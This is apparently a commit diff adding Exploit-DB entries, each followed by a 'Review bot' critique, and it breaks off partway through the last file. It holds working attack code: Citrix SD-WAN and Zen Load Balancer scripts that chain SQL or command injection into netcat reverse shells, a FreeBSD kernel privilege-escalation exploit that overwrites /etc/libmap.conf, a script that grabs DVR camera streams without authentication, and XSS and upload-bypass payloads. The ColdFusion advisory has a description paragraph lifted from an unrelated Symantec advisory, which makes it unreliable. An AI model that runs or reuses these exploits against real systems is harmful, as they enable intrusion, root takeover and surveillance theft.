'FileName': '1576142987.918625.dll',
'Index': 0},
'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
'Telerik.Web.UI, Version=<VERSION>, '
'Culture=neutral, '
'PublicKeyToken=<TOKEN>',
'TempFileName': '1576142987.918625.dll'}}
[*] Triggering deserialization...
<title>Runtime Error</title>
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
...omitted for brevity...
[*] Response time: 13.01 seconds
In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).
Thanks
@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip
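Review bot: the sample run prints an ASP.NET `<title>Runtime Error</title>` page after `[*] Triggering deserialization...`, but the explanation only interprets the `[*] Response time: 13.01 seconds` line; state explicitly whether that error page is the expected outcome of a successful trigger, otherwise a reader will take it for a failed attempt. The `-v <VERSION>` argument is documented only as a placeholder; state the accepted format of the value so the usage line is self-explanatory.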


@ -0,0 +1,21 @@
# Exploit Title: DotNetNuke 9.5 - Persistent Cross-Site Scripting
# Date: 2020-02-23
# Exploit Author: Sajjad Pourali
# Vendor Homepage: http://dnnsoftware.com/
# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
# Version: <= 9.5
# CVE : N/A
# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
DNN allows normal users to upload XML files by using journal tools in their profile. An attacker could upload XML files which may execute malicious scripts in the users browser.
In XML, a namespace is an identifier used to distinguish between XML element names and attribute names which might be the same. One of the standard namespaces is “http://www.w3.org/1999/xhtml” which permits us to run XHTML tags such as <script>.
For instance, uploading the following code as an XML file executes javascript and shows a non-harmful XSS alert.
<?xml version="1.0" encoding="UTF-8"?>
<script xmlns="http://www.w3.org/1999/xhtml">
alert('XSS');
</script>
Though stealing of authentication cookies are not possible at this time (because the authentications cookies are set as HttpOnly by default), XSS attacks are not limited to stealing users cookies. Using XSS vulnerability, an attacker can perform other more damaging attacks on other or high privileged users, for example, bypassing CSRF protections which allows uploading “aspx” extension files through settings page which leads to upload of backdoor files.
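Review bot: the advisory never states the URL from which the uploaded XML is served back or the response Content-Type, and that is the detail that makes the `<script xmlns="http://www.w3.org/1999/xhtml">` element execute (an XML content type on the same origin rather than an image type or a forced download); add it so a defender can verify the issue and its fix, and add a Fix/Mitigation line (the header has `CVE : N/A` and names no fixed version). The closing sentence about bypassing CSRF protections to upload 'aspx' files through the settings page introduces a second issue with no reference; either link its own advisory or drop it. Minor: 'users browser' should read 'user's browser'.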


@ -0,0 +1,70 @@
# Exploit Title: DotNetNuke 9.5 - File Upload Restrictions Bypass
# Date: 2020-02-23
# Exploit Author: Sajjad Pourali
# Vendor Homepage: http://dnnsoftware.com/
# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
# Version: <= 9.5
# CVE : N/A
# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
The DNN has a file upload module for superuser. As a superuser, you can upload files with the following formats — “jpg, jpeg, jpe, gif, bmp, png, svg, ttf, eot, woff, doc, docx, xls, xlsx, ppt, pptx, pdf, txt, xml, xsl, xsd, css, zip, rar, template, htmtemplate, ico, avi, mpg, mpeg, mp3, wmv, mov, wav, mp4, webm, ogv”.
As a normal user you are allowed to upload files with “bmp,gif,ico,jpeg,jpg,jpe,png,svg” extensions. The same file upload module used for superuser is reused for normal users with extra validation for a few additional extensions e.g. CSS extension is not allowed.
Unfortunately, only for superuser, whitelisted extension check is performed at the server end. For normal users, extra extension validation is performed at client-side only. Hence, a low privileged normal user can bypass the client-side validation and upload files with extensions which are allowed only for superuser only.
For example, a normal privileged user can upload a file with extension which is allowed only for superuser, by executing the following code on a browsers console (in the tab that manages profiles page has opened). This attack may also be performed using proxy tools such as Burp, ZAP etc.
dnn.createFileUpload({
"clientId": "dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_FileUploadControl",
"moduleId": "",
"parentClientId": null,
"showOnStartup": true,
"folderPicker": {
"selectedItemCss": "selected-item",
"internalStateFieldId": null,
"disabled": false,
"selectItemDefaultText": "",
"initialState": {
"selectedItem": {
"key": "0",
"value": "My Folder"
}
},
"onSelectionChanged": []
},
"maxFileSize": 299892736,
"maxFiles": 0,
"extensions": ["jpg", "jpeg", "jpe", "gif", "bmp", "png", "svg", "ttf", "eot", "woff", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "xml", "xsl", "xsd", "css", "zip", "rar", "template", "htmtemplate", "ico", "avi", "mpg", "mpeg", "mp3", "wmv", "mov", "wav", "mp4", "webm", "ogv"],
"resources": {
"title": "Upload Files",
"decompressLabel": "Decompress Zip Files",
"uploadToFolderLabel": "Upload To:",
"dragAndDropAreaTitle": "Drag files here or click to browse",
"uploadFileMethod": "Upload File",
"uploadFromWebMethod": "From URL",
"closeButtonText": "Close",
"uploadFromWebButtonText": "Upload",
"decompressingFile": "Decompressing File",
"fileIsTooLarge": "File size bigger than 286. Mb",
"fileUploadCancelled": "Upload cancelled",
"fileUploadFailed": "Upload failed",
"fileUploaded": "File uploaded",
"emptyFileUpload": "Your browser does not support empty file uploads.",
"fileAlreadyExists": "The file you want to upload already exists in this folder.",
"uploadStopped": "File upload stopped",
"urlTooltip": "Enter Resource URL like https://SomeWebSite.com/Images/About.png",
"keepButtonText": "Keep",
"replaceButtonText": "Replace",
"tooManyFiles": "You cannot upload more than {0} file(s) at once.",
"invalidFileExtensions": "Some selected files with invalid extensions are excluded from upload. You can only upload files with the following extensions: bmp, gif, ico, jpeg, jpg, jpe, png, svg.",
"unzipFilePromptTitle": "Unzip Information",
"unzipFileFailedPromptBody": "<div class=\"invalidFiles\"><p>[COUNT] of [TOTAL] file(s) were not extracted because their file types are not supported:</p>[FILELIST]</div>",
"unzipFileSuccessPromptBody": "<div class=\"validFiles\"><p>[TOTAL] of [TOTAL] file(s) were extracted successfully.</p></div>",
"errorDialogTitle": "Error"
},
"width": 780,
"height": 630,
"folderPath": dnn.dnnFileUpload.settings.dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_dnnFileUploadScope.folder,
"parameters": {}
});
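Review bot: the claim that 'extra extension validation is performed at client-side only' for normal users is not backed by any server response in this file; the pasted `dnn.createFileUpload({...})` call shows the superuser list being passed in `"extensions"` while `"invalidFileExtensions"` still names the eight image types, which proves the client-side mismatch but not that the server accepts a non-image extension from a low-privileged account. Add the request/response pair that demonstrates server-side acceptance, a fixed-version or vendor-response line (the header has `CVE : N/A` and no patch reference), and fix 'allowed only for superuser only'.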


@ -0,0 +1,64 @@
===========Security Intelligence============
# Vendor Homepage: adobe.com
# Version: 2018
# Tested on: Adobe ColdFusion 2018
# Exploit Author: Pankaj Kumar Thakur (Nepal)
==========[Table of Contents]==============
* Overview
* Detailed description
* Thanks & Acknowledgements
* References
==========[Vulnerability Information]========
* Unrestricted file upload in Adobe ColdFusion 2018
* CWE-434
* Base Score: 6.8 MEDIUM
* Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
=========[ Overview]=========================
* System Affected: Adobe ColdFusion 2018
* Impact: Unrestricted file upload
=====[ Detailed description]=================
Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code.
Request
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: hostname:portno
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Content-Type: multipart/form-data;
Content-Length: 303
Connection: close
Upgrade-Insecure-Requests: 1
.
.
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell_file with extension"
Content-Type: image/jpeg
shell code
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
.
.
After uploading shell, its located here
http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension
=====[ Thanks & Acknowledgements]========================================
* Acknowledged by Adobe
* Duplicate
* https://nvd.nist.gov/vuln/detail/CVE-2016-10258
* https://www.cvedetails.com/cve/CVE-2016-1713/
* https://www.openwall.com/lists/oss-security/2016/01/12/4
=====[ EOF ]===========================================================
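Review bot: the Detailed description paragraph does not describe the product in the header: it reads 'Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles', which is text from a different advisory, while the request below targets `/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm` on ColdFusion 2018. Rewrite the paragraph for ColdFusion, including who can reach the CKEditor filemanager upload and whether it requires an authenticated administrator (which the `PR:H/UI:R` vector implies). The Thanks & Acknowledgements block lists `* Duplicate` followed by two CVE links and an oss-security post without saying which CVE Adobe considers this a duplicate of; say so. The header is also missing the `# Exploit Title:` and `# Date:` lines the other files in this commit use, and the request line is split so `HTTP/1.1` sits on its own line.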

104
exploits/cgi/webapps/47112.py Executable file

@ -0,0 +1,104 @@
# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
# Date: 2019-07-12
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.citrix.com
# Product: Citrix SD-WAN
# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
# Version: Tested against 10.2.2
# Tested on:
# - Vendor-provided .OVA file
# CVE: CVE-2019-12989, CVE-2019-12991
#
# See Also:
# https://www.tenable.com/security/research/tra-2019-32
# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
# https://support.citrix.com/article/CTX251987
#
# This code exploits both CVE-2019-12989 and CVE-2019-12991
# You'll need your own Netcat listener
import requests, urllib
import sys, os, argparse
import random
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
TIMEOUT = 10 # sec
def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)
# CVE-2019-12989
# auth bypass via file write
def do_sql_injection(base_url):
url = base_url + '/sdwan/nitro/v1/config/get_package_file?action=file_download'
headers = { 'SSL_CLIENT_VERIFY' : 'SUCCESS' }
token = random.randint(10000, 99999)
json = {
"get_package_file": {
"site_name" : "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_" + str(token) + "';#",
"appliance_type" : "primary",
"package_type" : "active"
}
}
try:
r = requests.post(url, headers=headers, json=json, verify=False, timeout=TIMEOUT)
except requests.exceptions.ReadTimeout:
return None
# error is expected
expected = {"status":"fail","message":"Invalid value specified for site_name or appliance_type"}
if (r.status_code == 400 and r.json() == expected):
return token
else:
return None
# CVE-2019-12991
# spawns a reverse shell
def do_cmd_injection(base_url, token, ncip, ncport):
cmd = 'sudo nc -nv %s %d -e /bin/bash' % (ncip, ncport) #
url = base_url + '/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % (token, cmd)
success = False
try:
r = requests.get(url, verify=False, timeout=TIMEOUT)
except requests.exceptions.ReadTimeout:
success = True
# a timeout is success. it means we should have a shell
return success
##### MAIN #####
desc = 'Citrix SD-WAN Appliance Auth Bypass and Remote Command Execution'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Citrix SD-WAN IP Address (Required)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
args = arg_parser.parse_args()
print "Starting... be patient. This takes a sec."
# Path to target app
base_url = 'https://' + args.t
# do sql injection to get a swc-token for auth bypass
token = do_sql_injection(base_url)
if (token is None):
err_and_exit('SQL injection failed.')
print 'SQL injection successful! Your swc-token is ' + str(token) + '.'
# if this worked, do the command injection
# create a new admin user and spawn a reverse shell
success = do_cmd_injection(base_url, token, args.ncip, args.ncport)
if success is False:
err_and_exit('Not so sure command injection worked. Expected a timeout.')
print 'Seems like command injection succeeded.'
print 'Check for your shell!\n'
print 'To add an admin web user, run this command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1'
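Review bot: the comment before the last step, `# create a new admin user and spawn a reverse shell`, does not match `do_cmd_injection()`, which only runs the `nc` payload; the admin-user step exists solely as the `perl /home/talariuser/bin/user_management.pl ...` hint printed at the end, so reword the comment to say the script stops at the shell and user creation is a manual follow-up. Two smaller points: the file uses Python 2 `print` statements and the Python 2 `urllib` import with no shebang or version note in the header, and the success criterion `# a timeout is success` is also what an unreachable listener or a slow appliance produces, which the closing message already hedges ('Not so sure command injection worked'); state both the Python 2 requirement and the weak success signal in the header.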

75
exploits/cgi/webapps/47368.sh Executable file

@ -0,0 +1,75 @@
#!/bin/bash
#
#
# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
#
#
# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
# Product web page: http://www.rifatron.com
# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
# 7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
# Firmware: <=8.0 (000143)
#
#
# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
# servicing the security market as a leading CCTV/video surveillance security
# system manufacturer, specializing in stand-alone digital video recorder since
# 1998. We are known for marking the first standalone DVR with audio detection
# and 480 frames per secone(fps) and have been focusing on highend products and
# large projects in a variety applications and merket. These include government
# and public services, banking and finance, hotels and entertatinment, retail
# education, industrial and commercial sectors throughout Europe, Middle East,
# the U.S. and Asia. Based on the accumulated know-how in the security industry,
# Rifatron is trying its utmost for the technology development and customer
# satisfaction to be the best security solution company in the world.
#
# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
# disclosure when animate.cgi script is called through Mobile Web Viewer module.
#
# Tested on: Embedded Linux
# Boa/0.94.14rc21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5532
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
#
#
# 03.09.2019
#
#{PoC}
#
set -euo pipefail
IFS=$'\n\t'
if [ "$#" -ne 2 ]; then
echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
echo "Ex.: $0 10.9.8.7:65432 10"
exit
fi
IP=$1
CHANNEL=$2
HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$STATUS" == "404" ]; then
echo "Target not vulnerable!"
exit
fi
echo "Collecting snapshots..."
for x in {1..10};
do echo -ne $x
curl "$HOST" -o sequence-$x.jpg -#;
sleep 0.6
done
echo -ne "\nDone."
echo -ne "\nRendering video..."
ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
echo " done."
echo -ne "\nRunning animation..."
sleep 1
cvlc video.mp4 --verbose -1 -f vlc://quit
#
#{/PoC}
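Review bot: both early exits return status 0: the usage branch after `echo "Usage: $0 IP:PORT CHANNEL"` and the `echo "Target not vulnerable!"` branch use a bare `exit`, so a caller cannot distinguish a failed precondition from a completed run; use `exit 1` in both. The precondition check `STATUS=$(curl -Is http://$IP/mobile_viewer_login.html ...)` only compares against `404`, so a connection failure (empty `$STATUS`) falls through to the snapshot loop, and `$IP` should be quoted. Minor: the Summary block has typos ('secone', 'merket', 'entertatinment').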


@ -0,0 +1,23 @@
# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Google Dork: In Shodan search engine, the filter is "CHIYU"
# Date: 2020-02-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.chiyu-t.com.tw/en/
# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
# Tested on: It is a proprietary devices: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
# CVE: CVE-2020-8839
# 1. Description:
# In CHIYU BF430 web page,
# user can modify the system configuration by access the /if.cgi.
# Attackers can inject malicious XSS code in "TF_submask" field.
# The XSS code will be stored in the database, so that causes a stored XSS vulnerability.
# 2. Proof of Concept:
# Access the /if.cgi of CHIYU BF430 232/485 TCP/IP Converter.
# Injecting the XSS code in parameter “TF_submask”:
# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
==---------------------------------------------------------------
This email contains information that is for the sole use of the intended recipient and may be confidential or privileged. If you are not the intended recipient, note that any disclosure, copying, distribution, or use of this email, or the contents of this email is prohibited. If you have received this email in error, please notify the sender of the error and delete the message. Thank you.
---------------------------------------------------------------==!!
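Review bot: the last three lines are a mailing-list e-mail confidentiality footer ('This email contains information that is for the sole use of the intended recipient ...'), not part of the advisory, and should be stripped before archiving. The `# Tested on:` field carries a product page URL instead of a firmware version, and the advisory has no explicit Fix line even though the header implies one (versions prior to 1.16.00 are affected, so 1.16.00 is the remediation); add it.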

110
exploits/cgi/webapps/48266.py Executable file

@ -0,0 +1,110 @@
# Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution
# Google Dork: no
# Date: 2020-03-28
# Exploit Author: Cody Sixteen
# Vendor Homepage: https://code610.blogspot.com
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Linux
# CVE : CVE-2019-7301
#c@kali:~/src/eonila/zenload3r$ cat zenload3r.py
#!/usr/bin/env python
# zenload3r.py - zen load balancer pwn3r
# 28.03.2020 @ 22:41
#
# by cody sixteen
#
import base64
import sys, re
import requests
import ssl
from functools import partial
ssl.wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1)
# disable ssl warnings:
import urllib3
urllib3.disable_warnings()
from requests.auth import HTTPBasicAuth
#
target = sys.argv[1]
username = 'admin'
password = 'P@ssw0rd'
def main():
print 'zenload3r.py - zen load balancer pwn3r'
print ' zenload3r.py - vs - %s' % ( target )
print ''
print '[+] checking if host is alive...'
global sess
sess = requests.session()
global baseUrl
baseUrl = target + ':444/index.cgi'
checkBaseUrl = sess.get(baseUrl, verify=False)
checkBaseResp = checkBaseUrl.status_code
#print checkBaseResp
if checkBaseResp == 401:
print '[i] ...it is. we need to log in to proceed'
logmein(baseUrl)
def logmein(target):
print '[+] trying %s and default password "%s" vs %s' % (username, password, baseUrl)
#pwd_file = '/usr/share/wordlists/dirb/common.txt'
pwd_file = 'passwd.lst'
try:
read_pwds = open(pwd_file, 'r')
pwds = read_pwds.readlines()
for pwd in pwds:
pwd = pwd.rstrip()
logme = sess.post(baseUrl, auth=HTTPBasicAuth(username,pwd), allow_redirects=True)
logmeresp = logme.text
#print logmeresp
if '<p>Hello <strong>admin</strong>' in logmeresp:
print '[+] admin user logged-in! :D'
print '[+] working password: %s' % ( pwd )
load3r(baseUrl, pwd)
except requests.exceptions.ConnectionError:
print '[-] Can not connect to remote host :C\n'
def load3r(baseUrl, pwd):
print '[+] time to get reverse shell, preparing...'
creds = base64.b64encode("{}:{}".format(username,pwd))
creds2 = creds.rstrip()
print 'creds: ', creds2
baseUrl = "https://192.168.1.200:444/index.cgi"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded", "Origin": "https://192.168.1.200:444",
"Authorization": "Basic {}".format(creds2), "Connection": "close",
"Referer": "https://192.168.1.200:444/index.cgi?id=1-3&action=Show_Form", "Upgrade-Insecure-Requests": "1"
}
sh = "a\";nc 192.168.1.170 4444 -e /bin/sh;#"
reqdata = {"cert_name": "qweqweqwe", "cert_issuer": "Sofintel",
"cert_fqdn": "qweqweqwe", "cert_division": "qweqweqwe",
"cert_organization": sh,
"cert_locality": "qweqweqwe", "cert_state": "qweqweqwe",
"cert_country": "qw", "cert_mail": "qweqweqwe@qweqweqwe.com",
"cert_key": "2048", "id": "1-3", "actionpost": "Generate CSR", "button": "Generate CSR"}
requests.post(baseUrl, headers=headers, data=reqdata,verify=False)
print '[*] got r00t? ;>\n'
# run me:
if __name__ == '__main__':
main()
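Review bot: the first code line, `#c@kali:~/src/eonila/zenload3r$ cat zenload3r.py`, is a pasted shell prompt, so the `#!/usr/bin/env python` shebang is no longer the first line and the file is not directly executable; drop the prompt line. In `load3r()`, `baseUrl = "https://192.168.1.200:444/index.cgi"` overwrites the parameter, and the `Origin`/`Referer` headers and the `nc 192.168.1.170 4444` string are likewise hard-coded, so the `target` read from `sys.argv[1]` only governs the liveness check; say in the header that this is a fixed-address lab PoC. Also: `# Vendor Homepage:` points at the author's blog rather than the Zen Load Balancer project, `passwd.lst` is read but not shipped and only `ConnectionError` is caught (a missing file raises an uncaught `IOError`), and the Python 2 `print` statements deserve a version note.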

677
exploits/freebsd/local/47829.sh Executable file

@ -0,0 +1,677 @@
# Exploit: FreeBSD-SA-19:02.fd - Privilege Escalation
# Date: 2019-12-30
# Author: Karsten König of Secfault Security
# Twitter: @gr4yf0x
# Kudos: Maik, greg and Dirk for discussion and inspiration
# CVE: CVE-2019-5596
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
#!/bin/sh
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
umask 0000
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
cp /etc/libmap.conf ./
cat > heavy_cyber_weapon.c << EOF
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <pthread_np.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/cpuset.h>
#include <sys/event.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/sysctl.h>
#include <sys/types.h>
#include <sys/un.h>
#define N_FDS 0xfe
#define N_OPEN 0x2
#define N 1000000
#define NUM_THREADS 400
#define NUM_FORKS 3
#define FILE_SIZE 1024
#define CHUNK_SIZE 1
#define N_FILES 25
#define SERVER_PATH "/tmp/sync_forks"
#define DEFAULT_PATH "/tmp/pwn"
#define HAMMER_PATH "/tmp/pwn2"
#define ATTACK_PATH "/etc/libmap.conf"
#define HOOK_LIB "libutil.so.9"
#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
#define CORE_0 0
#define CORE_1 1
#define MAX_TRIES 500
struct thread_data {
int fd;
int fd2;
};
pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
int send_recv(int fd, int sv[2], int n_fds) {
int ret, i;
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmh;
char cmsg[CMSG_SPACE(sizeof(int)*n_fds)];
int *fds; char buf[1];
iov.iov_base = "a";
iov.iov_len = 1;
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmsg;
msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds);
msg.msg_flags = 0;
cmh = CMSG_FIRSTHDR(&msg);
cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds);
cmh->cmsg_level = SOL_SOCKET;
cmh->cmsg_type = SCM_RIGHTS;
fds = (int *)CMSG_DATA(cmsg);
for (i = 0; i < n_fds; i++) {
fds[i] = fd;
}
ret = sendmsg(sv[0], &msg, 0);
if (ret == -1) {
return 1;
}
iov.iov_base = buf;
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmh;
msg.msg_controllen = CMSG_SPACE(0);
msg.msg_flags = 0;
ret = recvmsg(sv[1], &msg, 0);
if (ret == -1) {
return 1;
}
return 0;
}
int open_tmp(char *path)
{
int fd;
char *real_path;
if (path != NULL) {
real_path = malloc(strlen(path) + 1);
strcpy(real_path, path);
}
else {
real_path = malloc(strlen(DEFAULT_PATH) + 1);
strcpy(real_path, DEFAULT_PATH);
}
if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) {
perror("[!] open");
exit(1);
}
fchmod(fd, 0700);
return fd;
}
void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
bzero(remote, sizeof(struct sockaddr_un));
remote->sun_family = AF_UNIX;
strncpy(remote->sun_path, path, sizeof(remote->sun_path));
}
int bind_domain_socket(struct sockaddr_un *remote) {
int server_socket;
if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
if (bind(server_socket,
(struct sockaddr *) remote,
sizeof(struct sockaddr_un)) != 0) {
perror("[!] bind");
exit(1);
}
return server_socket;
}
int connect_domain_socket_client() {
int client_socket;
if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
return client_socket;
}
// Prevent panic at termination because f_count of the
// corrupted struct file is 0 at the moment this function
// is used but fd2 still points to the struct, hence fdrop()
// is called at exit and will panic because f_count will
// be below 0
//
// So we just use our known primitive to increase f_count
void prevent_panic(int sv[2], int fd)
{
send_recv(fd, sv, 0xfe);
}
int stick_thread_to_core(int core) {
/* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */
/* if (core_id < 0 || core_id >= num_cores) */
/* return EINVAL; */
cpuset_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(core, &cpuset);
pthread_t current_thread = pthread_self();
return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
}
void *trigger_uaf(void *thread_args) {
struct thread_data *thread_data;
int fd, fd2;
if (stick_thread_to_core(CORE_0) != 0) {
perror("[!] [!] trigger_uaf: Could not stick thread to core");
}
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = thread_data->fd2;
printf("[+] trigger_uaf: fd: %d\n", fd);
printf("[+] trigger_uaf: fd2: %d\n", fd2);
printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
pthread_mutex_lock(&trigger_mtx);
pthread_cond_wait(&trigger_cond, &trigger_mtx);
usleep(40);
// Close to fds to trigger uaf
//
// This assumes that fget_write() in kern_writev()
// was already successful!
//
// Otherwise kernel panic is triggered
//
// refcount = 2 (primitive+fget_write)
close(fd);
close(fd2);
// refcount = 0 => free
fd = open(ATTACK_PATH, O_RDONLY);
// refcount = 1
printf("[+] trigger_uaf: Opened read-only file, now hope\n");
printf("[+] trigger_uaf: Exit\n");
pthread_exit(NULL);
}
void *hammer(void *arg) {
int i, j, k, client_socket, ret;
char buf[FILE_SIZE], sync_buf[3];
FILE *fd[N_FILES];
struct sockaddr_un remote;
prepare_domain_socket(&remote, SERVER_PATH);
client_socket = connect_domain_socket_client();
strncpy(sync_buf, "1\n", 3);
for (i = 0; i < N_FILES; i++) {
unlink(HAMMER_PATH);
if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
perror("[!] fopen");
exit(1);
}
}
for (i = 0; i < FILE_SIZE; i++) {
buf[i] = 'a';
}
pthread_mutex_lock(&hammer_mtx);
// Sometimes sendto() fails because
// no free buffer is available
for (;;) {
if (sendto(client_socket,
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &remote,
sizeof(remote)) != -1) {
break;
}
}
pthread_cond_wait(&hammer_cond, &hammer_mtx);
pthread_mutex_unlock(&hammer_mtx);
for (i = 0; i < N; i++) {
for (k = 0; k < N_FILES; k++) {
rewind(fd[k]);
}
for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
for (k = 0; k < N_FILES; k++) {
if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
perror("[!] fwrite");
exit(1);
}
}
fflush(NULL);
}
}
pthread_exit(NULL);
}
// Works on UFS only
void *monitor_dirty_buffers(void *arg) {
int hidirtybuffers, numdirtybuffers;
size_t len;
len = sizeof(int);
if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
perror("[!] sysctlbyname hidirtybuffers");
exit(1);
};
printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
while(1) {
sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
if (numdirtybuffers >= hidirtybuffers) {
pthread_cond_signal(&write_cond);
pthread_cond_signal(&trigger_cond);
printf("[+] monitor: Reached hidirtybuffers watermark\n");
break;
}
}
pthread_exit(NULL);
}
int check_write(int fd) {
char buf[256];
int nbytes;
struct stat st;
printf("[+] check_write\n");
stat(DEFAULT_PATH, &st);
printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size);
stat(ATTACK_PATH, &st);
printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size);
nbytes = read(fd, buf, strlen(HOOK_LIB));
printf("[+] Read bytes: %d\n", nbytes);
if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
return 1;
}
else if (nbytes < 0) {
perror("[!] check_write:read");
printf("[!] check_write:Cannot check if it worked!");
return 1;
}
